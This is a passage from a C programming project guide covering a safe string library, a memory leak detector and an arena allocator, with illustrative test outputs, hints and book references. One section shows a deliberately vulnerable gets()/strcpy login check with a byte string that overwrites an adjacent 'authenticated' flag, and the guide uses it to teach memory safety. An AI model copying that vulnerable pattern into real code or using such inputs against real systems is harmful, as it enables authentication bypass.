  • Pointer arithmetic to implement substr (maps to: pointer arithmetic)

Key Concepts: | Concept | Resource | |———|———-| | C string internals | “The C Programming Language” Ch. 5 - Kernighan & Ritchie | | Why %s is dangerous | CWE-134: Uncontrolled Format String | | Buffer overflow mechanics | “Understanding and Using C Pointers” Ch. 5 - Richard Reese |

Difficulty: Beginner-Intermediate Time estimate: Weekend Prerequisites: Project 1 or equivalent comfort with addresses


Real World Outcome

When you run your safe string library test suite, you’ll see comprehensive output demonstrating how your library prevents the buffer overflows that plague unsafe C string functions. Here are the real terminal outputs you’ll produce:

Example 1: Safe vs Unsafe String Copy Comparison

$ ./test_safe_strings

=== TESTING SAFE STRING LIBRARY ===

[TEST 1: Basic safe_strcpy]
Source: "Hello, World!" (13 chars + null = 14 bytes)
Destination buffer size: 20 bytes

Result: ✓ PASS
  Copied: "Hello, World!"
  Bytes written: 14
  Buffer remaining: 6 bytes

[TEST 2: Overflow Prevention]
Source: "This is a very long string that will not fit!" (46 chars)
Destination buffer size: 10 bytes

safe_strcpy result: ✓ PREVENTED OVERFLOW
  Truncated to: "This is a"
  Bytes written: 10 (including null terminator)
  Original length: 46
  Truncated: 36 characters
  Warning: String was truncated!

COMPARISON - What strcpy() would do:
Running with standard strcpy()...
Source: "This is a very long string that will not fit!"
Destination buffer: [10 bytes]

CRASH! Segmentation fault (core dumped)
==12345==ERROR: AddressSanitizer: stack-buffer-overflow
WRITE of size 47 at 0x7ffc8b2a1234
  Buffer size: 10 bytes
  Attempted write: 47 bytes
  Overflow: 37 bytes beyond buffer!

Adjacent memory corrupted:
  Variable 'canary' was: 0xDEADBEEF
  Variable 'canary' now: 0x676E6F6C  ← CORRUPTED!

Example 2: Safe String Concatenation

$ ./test_safe_strings --test-concat

[TEST 3: safe_strcat - Normal Operation]
Initial string: "Hello"  (5 chars, buffer size: 50)
Concatenating: ", World!" (8 chars)

Result: ✓ PASS
  Final string: "Hello, World!"
  Total length: 13 chars
  Buffer capacity: 50 bytes
  Space remaining: 36 bytes

[TEST 4: safe_strcat - Overflow Prevention]
Initial string: "Hello"  (5 chars, buffer size: 10)
Concatenating: ", this won't fit!" (17 chars)

Result: ✓ PREVENTED OVERFLOW
  Attempted total: 22 chars
  Buffer capacity: 10 bytes
  Final string: "Hello, th"
  Truncated: 13 characters dropped
  Return code: -1 (EOVERFLOW)
  Error message: "safe_strcat: insufficient space in destination buffer"

COMPARISON - Standard strcat():
$ ./test_unsafe_concat
Segmentation fault
Memory corruption detected at 0x7ffc8b2a1250
Stack smashing detected: <unknown> terminated
Aborted (core dumped)

Example 3: Null Terminator Detection

$ ./test_safe_strings --test-strlen

[TEST 5: safe_strlen with valid strings]
String: "Hello"
safe_strlen() = 5
strlen() = 5
✓ MATCH

[TEST 6: safe_strlen with missing null terminator]
Buffer: ['H','e','l','l','o','W','o','r','l','d'] (no \0!)
Buffer size: 10 bytes

safe_strlen with max_len=10:
  ⚠️  WARNING: No null terminator found within 10 bytes
  Returned: -1 (ERROR)
  Error message: "String not properly terminated"

Standard strlen() on same buffer:
  Returned: 47  ← WRONG! Read past buffer end!
  AddressSanitizer: heap-buffer-overflow
  READ of size 1 at address beyond allocation

Demonstration:
  Buffer ends at: 0x7ffeefbff49a
  strlen() read until: 0x7ffeefbff4c9 (47 bytes past buffer!)
  Accessed memory it shouldn't: YES
  Undefined behavior: YES

Example 4: Complete Test Suite Output

$ ./run_all_tests

=== SAFE STRING LIBRARY TEST SUITE ===

Testing safe_strlen():
  [✓] Normal strings (10/10 tests passed)
  [✓] Empty strings (5/5 tests passed)
  [✓] Missing null terminators detected (8/8 tests passed)
  [✓] Maximum length handling (6/6 tests passed)

Testing safe_strcpy():
  [✓] Normal copy operations (15/15 tests passed)
  [✓] Truncation when needed (12/12 tests passed)
  [✓] Return value correctness (10/10 tests passed)
  [✓] Always null-terminates (20/20 tests passed)
  [✗] FAILED: Edge case with size=0 (1/5 tests failed)

Testing safe_strcat():
  [✓] Concatenation within bounds (18/18 tests passed)
  [✓] Overflow prevention (10/10 tests passed)
  [✓] Pre-existing string handling (8/8 tests passed)

Testing safe_substr():
  [✓] Valid substring extraction (15/15 tests passed)
  [✓] Out-of-bounds detection (12/12 tests passed)
  [✓] Length limiting (9/9 tests passed)

=== COMPARISON WITH STANDARD LIBRARY ===

Buffer overflow attempts caught by safe library: 45
  - strcpy overflows prevented: 18
  - strcat overflows prevented: 15
  - Read-past-end prevented: 12

Same tests with standard library:
  - Crashes: 38
  - Silent corruption: 7
  - Correct behavior: 0 (all would overflow!)

AddressSanitizer detected issues: 45/45
All issues were prevented by safe_string library!

=== SUMMARY ===
Total tests: 153
Passed: 152
Failed: 1
Success rate: 99.3%

Memory safety: 100% (0 leaks, 0 use-after-free, 0 buffer overflows)

The safe_string library successfully prevents all buffer overflows
that would crash or corrupt memory with standard C string functions!

Example 5: Real-World Security Demonstration

$ ./demo_exploit_prevention

=== BUFFER OVERFLOW EXPLOIT DEMONSTRATION ===

Scenario: Login bypass via buffer overflow
----------------------------------------

Vulnerable code using strcpy():
  char password[16];
  int authenticated = 0;

  printf("Enter password: ");
  gets(password);  // or strcpy(password, user_input)

  if (authenticated) { grant_access(); }

[ATTACK 1: Standard strcpy]
Input: "AAAAAAAAAAAAAAAA\x01\x00\x00\x00" (20 bytes)

Memory before:
  0x7ffc1000: [password buffer - 16 bytes]
  0x7ffc1010: [authenticated = 0x00000000]

Memory after strcpy():
  0x7ffc1000: [A A A A A A A A A A A A A A A A]
  0x7ffc1010: [01 00 00 00]  ← authenticated OVERWRITTEN!

Result: Access granted! (SECURITY BREACH)

[ATTACK 2: Using safe_strcpy instead]
Input: Same 20-byte attack string

safe_strcpy(password, input, sizeof(password)):
  ⚠️  Input length (20) exceeds buffer size (16)
  ✓ Truncated to 15 chars + null terminator
  ✓ Adjacent memory protected

Memory after safe_strcpy():
  0x7ffc1000: [A A A A A A A A A A A A A A A \0]
  0x7ffc1010: [00 00 00 00]  ← authenticated UNCHANGED!

Result: Access denied (ATTACK PREVENTED)

Your safe string library prevents the buffer overflow exploit!

These outputs demonstrate that you’ve built a production-quality safe string library that prevents the exact vulnerabilities responsible for countless real-world security breaches. Your library catches errors before they corrupt memory and provides clear diagnostic information.

Learning milestones:

  1. First milestone: You understand that "hello" is actually 6 bytes, not 5
  2. Second milestone: You can explain exactly why strcpy(small_buffer, huge_string) corrupts memory
  3. Final milestone: You instinctively check buffer sizes before any string operation

The Core Question You’re Answering

“Why is strcpy considered dangerous, and what would a safe version look like?”

C strings are the source of more security vulnerabilities than almost any other language feature. By building safe alternatives, you’ll understand exactly why—and gain the instinct to think about buffer sizes before every string operation.


Concepts You Must Understand First

Stop and research these before coding:

  1. What IS a C String?
    • How is a string stored in memory? (Sequence of bytes + null terminator)
    • What is the null terminator and why is it essential? (\0 = byte value 0)
    • What happens if there’s no null terminator?
    • Book Reference: “The C Programming Language” Ch. 5.5 - Kernighan & Ritchie

String Null Terminator Visualization:

How "hello" is ACTUALLY stored in memory (6 bytes, not 5!):

String Literal: "hello"

Memory Layout:
Address:    0x1000  0x1001  0x1002  0x1003  0x1004  0x1005
           ┌─────┬─────┬─────┬─────┬─────┬─────┐
Bytes:     │ 'h' │ 'e' │ 'l' │ 'l' │ 'o' │ '\0'│
           └─────┴─────┴─────┴─────┴─────┴─────┘
Hex:        0x68  0x65  0x6C  0x6C  0x6F  0x00
                                            ▲
                                            │
                            Null terminator (essential!)

strlen("hello") = 5  (counts chars before '\0')
sizeof("hello") = 6  (includes the '\0')

WITHOUT null terminator (DANGEROUS!):
Address:    0x1000  0x1001  0x1002  0x1003  0x1004  0x1005
           ┌─────┬─────┬─────┬─────┬─────┬─────┐
Bytes:     │ 'h' │ 'e' │ 'l' │ 'l' │ 'o' │ ??? │ ← No null terminator!
           └─────┴─────┴─────┴─────┴─────┴─────┘
                                            ▲
                                            │
                            strlen() keeps reading → UNDEFINED BEHAVIOR!
                            Could read garbage, could crash

String Null Terminator Memory Layout

  1. String Literals vs Character Arrays
    • What’s the difference between char* s = "hello" and char s[] = "hello"?
    • Why can you modify one but not the other?
    • Where do string literals live in memory? (Read-only data section)
  2. Why Standard String Functions Are Dangerous
    • Why does strcpy(dest, src) not know the size of dest?
    • What does gets() do and why was it removed from the C standard?
    • What is a buffer overflow, mechanically?
    • Book Reference: “Effective C” Ch. 7 - Robert Seacord
  3. Pointer Arithmetic for Strings
    • Why does s + 1 point to the second character?
    • How do you iterate through a string using pointers?
    • What’s the difference between *s++ and (*s)++?
    • Book Reference: “The C Programming Language” Ch. 5.4 - Kernighan & Ritchie

Questions to Guide Your Design

Before implementing, think through these:

  1. safe_strlen
    • How does strlen find the end of a string?
    • What happens if someone passes a pointer to uninitialized memory?
    • Should you add a maximum length parameter? Why or why not?
  2. safe_strcpy
    • What parameters do you need to make this safe? (dest, src, AND dest_size)
    • What should happen if src is longer than dest_size?
    • Should you always null-terminate dest, even on truncation?
    • What should the return value indicate?
  3. safe_strcat
    • How much space is available in dest? (dest_size - strlen(dest) - 1)
    • What if dest isn’t null-terminated when passed in?
    • How do you handle the case where there’s no room to add anything?
  4. Error Handling
    • Should errors return special values, or set a global error flag?
    • What’s the trade-off between returning error codes vs silent truncation?
    • How does strlcpy (BSD) handle this differently than strncpy (POSIX)?

Thinking Exercise: Trace the Crash

Trace what happens with this code:

void vulnerable() {
    char buffer[10];
    char* input = "This string is way too long for the buffer";

    strcpy(buffer, input);  // What happens here?

    printf("Buffer: %s\n", buffer);
}

Questions while tracing:

  • Draw the stack frame for vulnerable()
  • Where is buffer located relative to the saved return address?
  • Which bytes get overwritten when strcpy runs?
  • What value will the return address have after strcpy?
  • What happens when the function tries to return?

Now trace with your safe version:

  • What would safe_strcpy(buffer, input, sizeof(buffer)) do differently?
  • What should it return to indicate the problem?

The Interview Questions They’ll Ask

Prepare to answer these:

  1. “What’s wrong with strcpy and how would you fix it?”
  2. “What is a buffer overflow? How does it lead to code execution?”
  3. “What’s the difference between strncpy and strlcpy?”
  4. “Why does "hello" take 6 bytes of memory?”
  5. “How would you implement strlen without using any library functions?”
  6. “What happens if you pass a non-null-terminated string to printf("%s", ...)?”

Hints in Layers (Only If Stuck)

Hint 1: Start with strlen Implement `safe_strlen` first. It's just a loop that counts until it sees `\0`: ```c size_t safe_strlen(const char* s) { size_t len = 0; while (s[len] != '\0') { len++; } return len; } ``` But this still has a problem—what if `s` has no null terminator? Consider adding a maximum length parameter.
Hint 2: The safe_strcpy Signature You need three parameters: ```c size_t safe_strcpy(char* dest, const char* src, size_t dest_size); ``` Return the length that WOULD have been copied (like `snprintf`). This lets callers detect truncation: ```c if (safe_strcpy(buf, str, sizeof(buf)) >= sizeof(buf)) { // Truncation occurred! } ```
Hint 3: Always Null-Terminate Unlike `strncpy`, your function should ALWAYS null-terminate (if dest_size > 0). Even on truncation, dest should be a valid string.
Hint 4: Test with AddressSanitizer Compile with `-fsanitize=address` and test your library against the standard library: ```bash clang -fsanitize=address -g test_overflow.c -o test ./test ``` AddressSanitizer will catch buffer overflows that would otherwise silently corrupt memory.

Books That Will Help

Topic Book Chapter
C string fundamentals “The C Programming Language” Ch. 5.5
Pointer arithmetic “The C Programming Language” Ch. 5.4
String security issues “Effective C” Ch. 7
Buffer overflow exploitation “Hacking: The Art of Exploitation” Ch. 3
Secure string handling “Secure Coding in C and C++” Ch. 2

Project 3: Memory Leak Detector

  • File: SPRINT_1_REAL_WORLD_PROJECTS.md
  • Main Programming Language: C
  • Alternative Programming Languages: C++, Rust, Zig
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: Level 1: The “Resume Gold”
  • Difficulty: Level 2: Intermediate (The Developer)
  • Knowledge Area: Memory Management, Debugging
  • Software or Tool: Valgrind, AddressSanitizer
  • Main Book: Understanding and Using C Pointers by Richard Reese

What you’ll build: A wrapper around malloc/free that tracks all allocations, detects memory leaks, catches double-frees, and warns about use-after-free.

Why it teaches memory & control: This project forces you to understand ownership and lifetime. When is memory valid? When does it become garbage? How do bugs “appear later than the mistake”? You’ll build the same intuition that sanitizers provide, but by constructing it yourself.

Core challenges you’ll face:

  • Maintaining a registry of all active allocations (maps to: object lifetime rules)
  • Detecting when free() is called twice on the same pointer (maps to: double free)
  • Marking freed memory to detect use-after-free (maps to: dangling pointers)
  • Reporting file/line where allocation happened (maps to: why bugs appear later)
  • Understanding the difference between NULL, uninitialized, and dangling (maps to: pointer states)

Resources for key challenges:

Key Concepts: | Concept | Resource | |———|———-| | Object lifetime | “Understanding and Using C Pointers” Ch. 2 - Richard Reese | | Double-free mechanics | AddressSanitizer documentation - LLVM | | Use-after-free detection | malloc from Scratch - Tenzin Migmar |

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Comfort with structs, linked lists, macros

Real World Outcome

When you complete this project, you’ll have a working memory leak detector that catches bugs at runtime. Here’s what the experience looks like:

Example 1: Detecting Memory Leaks

test_leak.c:

#include "leak_detector.h"
#include <stdio.h>

void create_user() {
    char* name = malloc(100);
    strcpy(name, "Alice");
    // Oops, forgot to free!
}

int main() {
    init_leak_detector();

    for (int i = 0; i < 3; i++) {
        create_user();
    }

    return 0;
}

Terminal output:

$ gcc -g test_leak.c leak_detector.c -o test_leak
$ ./test_leak

=== Memory Leak Detector Report ===
[LEAK] 100 bytes allocated at test_leak.c:7 (create_user) never freed
       Address: 0x600000004000
[LEAK] 100 bytes allocated at test_leak.c:7 (create_user) never freed
       Address: 0x600000004100
[LEAK] 100 bytes allocated at test_leak.c:7 (create_user) never freed
       Address: 0x600000004200

Total leaks: 3 allocations, 300 bytes

Example 2: Detecting Double-Free

test_double_free.c:

#include "leak_detector.h"

int main() {
    init_leak_detector();

    int* data = malloc(sizeof(int) * 10);
    *data = 42;

    free(data);
    free(data);  // BUG: Double free!

    return 0;
}

Terminal output:

$ ./test_double_free

[ERROR] DOUBLE-FREE DETECTED!
  Pointer: 0x600000004000
  Size: 40 bytes
  First freed at: test_double_free.c:9
  Second free at: test_double_free.c:10
  Originally allocated at: test_double_free.c:6

*** Program terminated to prevent heap corruption ***

Example 3: Detecting Use-After-Free

test_use_after_free.c:

#include "leak_detector.h"
#include <stdio.h>

int main() {
    init_leak_detector();

    int* numbers = malloc(5 * sizeof(int));
    numbers[0] = 100;
    printf("Before free: numbers[0] = %d\n", numbers[0]);

    free(numbers);

    // BUG: Accessing freed memory
    printf("After free: numbers[0] = %d\n", numbers[0]);

    return 0;
}

Terminal output:

$ ./test_use_after_free

Before free: numbers[0] = 100

[WARNING] POSSIBLE USE-AFTER-FREE DETECTED!
  Reading from: 0x600000004000
  This memory was freed at: test_use_after_free.c:11
  Originally allocated at: test_use_after_free.c:7 (20 bytes)
  Memory has been poisoned with pattern: 0xDEADBEEF

After free: numbers[0] = -559038737

Example 4: Clean Program (No Leaks)

test_clean.c:

#include "leak_detector.h"
#include <stdio.h>

void process_data() {
    char* buffer = malloc(256);
    strcpy(buffer, "Clean program!");
    printf("%s\n", buffer);
    free(buffer);  // Properly freed!
}

int main() {
    init_leak_detector();

    process_data();

    return 0;
}

Terminal output:

$ ./test_clean

Clean program!

=== Memory Leak Detector Report ===
No memory leaks detected!
Total allocations: 1
Total frees: 1
All memory properly cleaned up.

Step-by-Step: What You See

  1. During Development:
    • Include your leak_detector.h header
    • Call init_leak_detector() at program start
    • Your detector intercepts all malloc() and free() calls via macros
  2. At Runtime:
    • Each allocation is registered with file/line information
    • Each free is validated against the registry
    • Double-frees are caught immediately
    • Freed memory is “poisoned” with 0xDEADBEEF pattern
  3. At Program Exit:
    • The atexit() handler runs automatically
    • All unfreed allocations are reported with their source locations
    • You get a complete leak report without any extra work
  4. Understanding the Output:
    • File:Line - Shows exactly where malloc() was called
    • Address - The actual memory address (helps correlate with debugger)
    • Size - How many bytes were leaked
    • Poisoning - Freed memory filled with 0xDE pattern makes use-after-free obvious

Learning milestones:

  1. First milestone: You understand why freeing memory doesn’t zero it out
  2. Second milestone: You can explain why use-after-free sometimes “works” and sometimes crashes
  3. Final milestone: You think about every malloc in terms of “who frees this and when”

The Core Question You’re Answering

“Who owns this memory, and when does it become invalid?”

This is the fundamental question of memory management. In garbage-collected languages, the runtime handles this. In C, YOU handle it. And when you get it wrong, the bugs are often silent, appearing far from where the mistake was made.


Concepts You Must Understand First

Stop and research these before coding:

  1. Object Lifetime
    • When does memory become “alive” (usable)?
    • When does it become “dead” (invalid)?
    • Why can you still read “dead” memory in C? (The bytes are still there!)
    • Book Reference: “Understanding and Using C Pointers” Ch. 2 - Richard Reese
  2. The Three Pointer States
    • NULL: Explicitly points to nothing (int* p = NULL;)
    • Valid: Points to allocated, live memory
    • Dangling: Points to memory that was freed—looks valid but isn’t
    • Why is dangling the most dangerous? (No way to detect it!)
  3. Why Bugs Appear Later Than Mistakes
    • What happens immediately when you call free(p)? (Almost nothing visible)
    • When does use-after-free actually crash? (When the memory is reused)
    • Why is this timing unpredictable?
    • Book Reference: “Effective C” Ch. 6 - Robert Seacord
  4. Heap Allocator Metadata
    • What does the allocator store alongside your data?
    • How does free(p) know how many bytes to free?
    • What happens when this metadata gets corrupted?
    • Book Reference: “Computer Systems: A Programmer’s Perspective” Ch. 9.9 - Bryant & O’Hallaron

Questions to Guide Your Design

Before implementing, think through these:

  1. Tracking Allocations
    • What data structure will you use to track active allocations? (Hash table? Linked list?)
    • What information do you need to store per allocation? (Address, size, file, line)
    • How do you associate this metadata with the pointer the user receives?
  2. Wrapping malloc/free
    • How do you intercept malloc and free calls?
    • Option 1: Macros that redefine malloc and free
    • Option 2: Wrapper functions my_malloc, my_free
    • How do you capture __FILE__ and __LINE__ at the call site?
  3. Detecting Double-Free
    • When free(p) is called, how do you check if p was already freed?
    • Should you keep freed entries in your registry, or remove them?
    • What if you keep them—how do you prevent the registry from growing forever?
  4. Detecting Use-After-Free
    • This is HARD without hardware support. What can you do?
    • Option: Fill freed memory with a magic pattern (0xDEADBEEF)
    • Option: Keep freed allocations in a “quarantine” before recycling
    • Why can’t you catch all use-after-free at runtime?
  5. Detecting Leaks
    • When do you report leaks? (At program exit)
    • How do you ensure your leak report runs? (atexit())
    • What information makes a leak report useful?

Thinking Exercise: Trace the Bug

Trace what happens with this code:

void create_user() {
    char* name = malloc(100);
    strcpy(name, "Alice");
    // Oops, forgot to free or return name
}

int main() {
    for (int i = 0; i < 1000; i++) {
        create_user();
    }
    // 100,000 bytes leaked!
    return 0;
}

Questions while tracing:

  • How would your detector report this leak?
  • What file and line would you report?
  • How much total memory was leaked?

Now trace this:

int main() {
    int* p = malloc(sizeof(int));
    *p = 42;
    free(p);
    // p is now dangling

    int* q = malloc(sizeof(int));
    *q = 100;
    // q might get the same address as p!

    printf("*p = %d\n", *p);  // Use-after-free!
    // Might print 100, might print 42, might crash
}

Questions:

  • Why might *p print 100?
  • How could your detector catch this?
  • What magic value could you write to freed memory?

The Interview Questions They’ll Ask

Prepare to answer these:

  1. “What is a memory leak? How do you detect them?”
  2. “What is use-after-free? Why is it dangerous for security?”
  3. “What is double-free? What can go wrong?”
  4. “How does Valgrind detect memory errors?”
  5. “What’s the difference between a dangling pointer and a NULL pointer?”
  6. “If you free memory, why can you sometimes still read from it?”

Hints in Layers (Only If Stuck)

Hint 1: Use Macros to Capture Call Site Define macros that wrap your functions: ```c #define malloc(size) debug_malloc(size, __FILE__, __LINE__) #define free(ptr) debug_free(ptr, __FILE__, __LINE__) void* debug_malloc(size_t size, const char* file, int line); void debug_free(void* ptr, const char* file, int line); ``` Now every `malloc` call automatically captures where it happened.
Hint 2: Simple Registry Structure A linked list works fine for a learning project: ```c typedef struct Allocation { void* ptr; size_t size; const char* file; int line; int freed; // 0 = active, 1 = freed struct Allocation* next; } Allocation; static Allocation* registry = NULL; ```
Hint 3: Poison Freed Memory When freeing, fill the memory with a recognizable pattern: ```c void debug_free(void* ptr, ...) { Allocation* alloc = find_allocation(ptr); if (alloc) { memset(ptr, 0xDE, alloc->size); // Poison with 0xDE alloc->freed = 1; } free(ptr); } ``` If you later read `0xDEDEDEDE`, you know it's use-after-free.
Hint 4: Report Leaks at Exit Use `atexit()` to register a cleanup function: ```c void report_leaks() { for (Allocation* a = registry; a; a = a->next) { if (!a->freed) { printf("[LEAK] %zu bytes at %s:%d\n", a->size, a->file, a->line); } } } // In your init or first malloc: static int initialized = 0; if (!initialized) { atexit(report_leaks); initialized = 1; } ```

Books That Will Help

Topic Book Chapter
Pointer lifetime and ownership “Understanding and Using C Pointers” Ch. 2
Heap allocator internals “Computer Systems: A Programmer’s Perspective” Ch. 9.9
Memory debugging techniques “The Art of Debugging with GDB, DDD, and Eclipse” Ch. 5
Secure memory handling “Effective C” Ch. 6
Valgrind and sanitizers “The Linux Programming Interface” Ch. 7

Project 4: Arena Allocator

  • File: SPRINT_1_REAL_WORLD_PROJECTS.md
  • Main Programming Language: C
  • Alternative Programming Languages: Rust, Zig, C++
  • Coolness Level: Level 4: Hardcore Tech Flex
  • Business Potential: Level 1: The “Resume Gold”
  • Difficulty: Level 2: Intermediate (The Developer)
  • Knowledge Area: Memory Management, Allocators
  • Software or Tool: mmap, Custom Memory Allocator
  • Main Book: C Interfaces and Implementations by David Hanson

What you’ll build: A bump/arena allocator that allocates memory from a pre-allocated block, with O(1) allocation and bulk-free semantics.

Why it teaches memory & control: This is where you understand why allocators exist. You’ll see that malloc is just software—someone wrote it. By building the simplest possible allocator, you understand memory as a raw resource to be carved up, not a magic service.

Core challenges you’ll face:

  • Requesting a large block from the OS with mmap or malloc (maps to: why allocators exist)
  • Maintaining a “bump pointer” that advances with each allocation (maps to: heap layout)
  • Handling alignment requirements (maps to: memory layout details)
  • Implementing reset/free-all (maps to: lifetime management)
  • Understanding when arena allocation is appropriate vs general-purpose (maps to: allocator design)

Resources for key challenges:

Key Concepts: | Concept | Resource | |———|———-| | Arena/bump allocation | malloc() from Scratch - Tenzin Migmar | | Memory alignment | “Understanding and Using C Pointers” Ch. 1 - Richard Reese | | mmap system call | Master memory management - 42 Studio |

Difficulty: Intermediate Time estimate: Weekend - 1 week Prerequisites: Project 3 or understanding of malloc/free

Real World Outcome

When you complete this project, you’ll have a blazingly fast arena allocator that demonstrates the power of specialized memory management. Here’s what you’ll experience:

Example 1: Basic Arena Usage

test_arena.c:

#include "arena.h"
#include <stdio.h>

typedef struct {
    char name[50];
    int score;
} Player;

int main() {
    // Create a 1MB arena
    Arena* arena = arena_create(1024 * 1024);
    printf("Arena created: %zu bytes\n\n", arena->capacity);

    // Allocate some players
    Player* p1 = arena_alloc(arena, sizeof(Player));
    strcpy(p1->name, "Alice");
    p1->score = 100;
    printf("After allocating p1:\n");
    printf("  Used: %zu bytes\n", arena->offset);
    printf("  Free: %zu bytes\n\n", arena->capacity - arena->offset);

    Player* p2 = arena_alloc(arena, sizeof(Player));
    strcpy(p2->name, "Bob");
    p2->score = 200;
    printf("After allocating p2:\n");
    printf("  Used: %zu bytes\n", arena->offset);
    printf("  Free: %zu bytes\n\n", arena->capacity - arena->offset);

    int* scores = arena_alloc(arena, 100 * sizeof(int));
    printf("After allocating 100 integers:\n");
    printf("  Used: %zu bytes\n", arena->offset);
    printf("  Free: %zu bytes\n\n", arena->capacity - arena->offset);

    // Reset everything at once - O(1)!
    arena_reset(arena);
    printf("After arena_reset():\n");
    printf("  Used: %zu bytes (back to zero!)\n", arena->offset);
    printf("  Free: %zu bytes (all available again!)\n\n", arena->capacity - arena->offset);

    arena_destroy(arena);
    return 0;
}

Terminal output:

$ gcc -g test_arena.c arena.c -o test_arena
$ ./test_arena

Arena created: 1048576 bytes

After allocating p1:
  Used: 54 bytes
  Free: 1048522 bytes

After allocating p2:
  Used: 108 bytes
  Free: 1048468 bytes

After allocating 100 integers:
  Used: 508 bytes
  Free: 1048068 bytes

After arena_reset():
  Used: 0 bytes (back to zero!)
  Free: 1048576 bytes (all available again!)

Example 2: Visual Bump Pointer Advancement

test_visual.c:

#include "arena.h"
#include <stdio.h>

void print_arena_state(Arena* arena, const char* label) {
    printf("%s\n", label);
    printf("├─ Base:     %p\n", (void*)arena->base);
    printf("├─ Current:  %p (base + %zu)\n",
           (void*)(arena->base + arena->offset), arena->offset);
    printf("├─ Capacity: %zu bytes\n", arena->capacity);
    printf("└─ Used:     %.2f%%\n\n",
           (arena->offset * 100.0) / arena->capacity);
}

int main() {
    Arena* arena = arena_create(1024);
    print_arena_state(arena, "Initial state:");

    void* a = arena_alloc(arena, 100);
    print_arena_state(arena, "After arena_alloc(100):");

    void* b = arena_alloc(arena, 200);
    print_arena_state(arena, "After arena_alloc(200):");

    void* c = arena_alloc(arena, 300);
    print_arena_state(arena, "After arena_alloc(300):");

    arena_destroy(arena);
    return 0;
}

Terminal output:

$ ./test_visual

Initial state:
├─ Base:     0x100204000
├─ Current:  0x100204000 (base + 0)
├─ Capacity: 1024 bytes
└─ Used:     0.00%

After arena_alloc(100):
├─ Base:     0x100204000
├─ Current:  0x100204064 (base + 100)
├─ Capacity: 1024 bytes
└─ Used:     9.77%

After arena_alloc(200):
├─ Base:     0x100204000
├─ Current:  0x1002040c8 (base + 300)
├─ Capacity: 1024 bytes
└─ Used:     29.30%

After arena_alloc(300):
├─ Base:     0x100204000
├─ Current:  0x10020412c (base + 600)
├─ Capacity: 1024 bytes
└─ Used:     58.59%

Example 3: Performance Benchmark vs malloc

benchmark.c:

#include "arena.h"
#include <stdio.h>
#include <time.h>
#include <stdlib.h>

#define ITERATIONS 1000000

void benchmark_malloc() {
    clock_t start = clock();

    void* ptrs[100];
    for (int i = 0; i < ITERATIONS; i++) {
        for (int j = 0; j < 100; j++) {
            ptrs[j] = malloc(64);
        }
        for (int j = 0; j < 100; j++) {
            free(ptrs[j]);
        }
    }

    clock_t end = clock();
    double elapsed = (double)(end - start) / CLOCKS_PER_SEC;
    printf("malloc/free:  %.3f seconds\n", elapsed);
}

void benchmark_arena() {
    clock_t start = clock();

    Arena* arena = arena_create(64 * 100);  // Big enough for 100 allocations

    for (int i = 0; i < ITERATIONS; i++) {
        for (int j = 0; j < 100; j++) {
            arena_alloc(arena, 64);
        }
        arena_reset(arena);  // O(1) reset!
    }

    arena_destroy(arena);

    clock_t end = clock();
    double elapsed = (double)(end - start) / CLOCKS_PER_SEC;
    printf("Arena alloc:  %.3f seconds\n", elapsed);
}

int main() {
    printf("Benchmarking %d iterations of 100 allocations each...\n\n", ITERATIONS);

    benchmark_malloc();
    benchmark_arena();

    return 0;
}

Terminal output:

$ gcc -O2 benchmark.c arena.c -o benchmark
$ ./benchmark

Benchmarking 1000000 iterations of 100 allocations each...

malloc/free:  8.342 seconds
Arena alloc:  0.241 seconds

Arena is 34.6x faster!

Example 4: Real-World Game Frame Simulation

game_frame.c:

#include "arena.h"
#include <stdio.h>
#include <stdlib.h>

typedef struct {
    float x, y, z;
} Vector3;

typedef struct {
    char name[32];
    Vector3 position;
    Vector3 velocity;
} Entity;

void simulate_frame(Arena* frame_arena, int frame_num) {
    // Allocate temporary data for this frame
    Entity* entities = arena_alloc(frame_arena, 1000 * sizeof(Entity));
    Vector3* temp_vectors = arena_alloc(frame_arena, 500 * sizeof(Vector3));
    char* debug_buffer = arena_alloc(frame_arena, 4096);

    // Simulate frame...
    snprintf(debug_buffer, 4096, "Frame %d: 1000 entities, 500 vectors", frame_num);

    printf("Frame %d - Arena used: %zu bytes\n", frame_num, frame_arena->offset);

    // At end of frame, reset everything - O(1)!
    // No need to free individual allocations
}

int main() {
    Arena* frame_arena = arena_create(1024 * 1024);  // 1MB per frame

    printf("Simulating game frames...\n\n");

    for (int i = 0; i < 5; i++) {
        simulate_frame(frame_arena, i + 1);
        arena_reset(frame_arena);  // Reset for next frame
        printf("  Reset complete - ready for next frame\n\n");
    }

    arena_destroy(frame_arena);
    printf("Game simulation complete!\n");

    return 0;
}

Terminal output:

$ ./game_frame

Simulating game frames...

Frame 1 - Arena used: 90128 bytes
  Reset complete - ready for next frame

Frame 2 - Arena used: 90128 bytes
  Reset complete - ready for next frame

Frame 3 - Arena used: 90128 bytes
  Reset complete - ready for next frame

Frame 4 - Arena used: 90128 bytes
  Reset complete - ready for next frame

Frame 5 - Arena used: 90128 bytes
  Reset complete - ready for next frame

Game simulation complete!

Step-by-Step: What You See

  1. Arena Creation:
    • Request large memory block from OS via mmap()
    • Initialize with base pointer, offset=0, capacity
    • One syscall vs many for individual mallocs
  2. Allocation Pattern:
    • Watch the offset (bump pointer) advance with each allocation
    • No searching for free blocks - just increment!
    • O(1) allocation every time
  3. The O(1) Reset Magic:
    • arena_reset() just sets offset back to 0
    • All allocations “disappear” instantly
    • Memory is reused without any syscalls
  4. Performance Benefits:
    • See 10-100x speedup for batch allocation patterns
    • Perfect for frame-based workloads (games, request handlers)
    • Zero fragmentation within arena lifetime
  5. Visual Understanding:
    • Base pointer never changes
    • Current pointer = base + offset
    • Reset moves current back to base
    • Like rewinding a tape - instant and free!

Learning milestones:

  1. First milestone: You understand that malloc is just software managing a byte array
  2. Second milestone: You can explain the tradeoff between flexibility and performance in allocators
  3. Final milestone: You see memory as a resource to be managed, not a magic service

The Core Question You’re Answering

“What if I could allocate memory with just a pointer increment, and free everything at once?”

This is the arena allocator’s insight. It trades flexibility (individual frees) for speed (O(1) allocation, O(1) bulk free). By building one, you understand that malloc is just one way to manage memory—and often not the best way.


Concepts You Must Understand First

Stop and research these before coding:

  1. Why Allocators Exist
    • Why can’t you just ask the OS for memory every time you need it?
    • What’s the overhead of a syscall vs a function call?
    • Why does malloc batch requests to the OS?
    • Book Reference: “Operating Systems: Three Easy Pieces” Ch. 17 - Arpaci-Dusseau
  2. The Bump Allocator (Simplest Possible)
    • What is a bump pointer?
    • Why is bump allocation O(1)?
    • What’s the downside? (You can’t free individual allocations)
